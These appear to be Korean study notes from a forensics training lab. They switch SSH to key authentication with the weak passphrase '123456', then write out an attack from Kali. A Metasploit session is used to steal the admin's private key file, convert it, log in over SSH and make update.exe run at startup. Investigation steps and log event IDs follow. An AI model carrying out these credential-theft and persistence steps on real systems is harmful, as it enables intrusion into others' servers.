📘 Day 43 (2025.08.13.WED) - 포렌식 시나리오 타임라인 분석표(악성코드)

📝 분석 질문

- 관리자는 악성코드를 읽었는가?
- 악성코드는 관리자 PD와 해커 서버로 언제 연결되었는가?
- 연결 후 유출된 파일은 있는가? 있다면 무슨 파일인가? 읽을 수 없다면 이유는 무엇인가?
- 해커는 관리자가 서버에 사용하는 인증키를 유출한다.

➤ 해커의 접속 흔적을 찾아라!
➤ 해커의 접속을 막는 방법은 무엇인가?
➤ 관리자는 패스워드 인증 방식은 안전한 것인가?
➤ 관리자는 tcpwrapper 적용 / 키 인증 방식 적용

계정이 유출됨, tcpwrapper 미적용 시 뚫림

🔑 인증 방식 변경

SSH 패스워드 인증 → 키 인증 방식 변경

공개키: 모두 / 개인키: 나

win7 (putty 192.168.1.1 접속, 실행창 2개 띄워놓고 해야함)
su
cd /etc/ssh/
cd sshd_config.d
nano 50-cloud-init.conf
PasswordAuthentication yes → no 수정
systemctl restart ssh
패스워드 인증 방식 변경
🔑 PuTTY Key 생성
C:\Program Files\PuTTY\puttygen
Generate → RSA 선택 후 마우스 움직여 생성

master@IP001(PuTTY)
mkdir .ssh && cd .ssh
nano authorized_keys (Generate에서 나온 키 복붙)
Key passphrase: 123456
Save private key → 바탕화면 → IP001.ppk
🔐 서버 설정
su
nano sshd_config
PubkeyAuthentication yes
systemctl restart ssh

master@IP001
cat authorized_keys
📌 PuTTY 설정

Session - 192.168.1.1 Load
SSH - Auth - Credentials - Private-key file: IP001.ppk 선택
Session - Save - Open

💻 Kali 설정 및 ppk 변환
msfconsole -r payload.rc(win7에서 update.exe 파일 실행)
경로: C:\Users\manager\Desktop(cd 이용해서 이동)
download IP001.ppk

sudo apt update && sudo apt install putty-tools
puttygen IP001.ppk -O private-openssh -o IP001.pem
Enter passphrase to load key: 비밀번호 입력
chmod 600 IP001.pem
ssh -i IP001.pem master@125.246.95.152 -p 22
일반 드라이버로 돌아오기
ssh -i IP001.pem master@125.246.95.152 -p 22
⚠️ 악성코드 자동 실행
cp update.exe /programData/Microsoft/Windows/Start\ Menu/Programs/Startup
📂 조사 항목

1. 서버의 접속 흔적 확인
2. 바탕화면 update.exe 생성 시점 확인
3. 누가 저장했는지 확인
4. 저장 경로 확인
5. UTM에서 IP001.ppk 유출 흔적 확인
6. 없으면 이유와 모니터링 방법 찾기

📜 로그 분석

C:\Windows\System32\winevt\Logs\Security.evtx
Event ID:
4624: 로그온
4648: 네트워크 로그온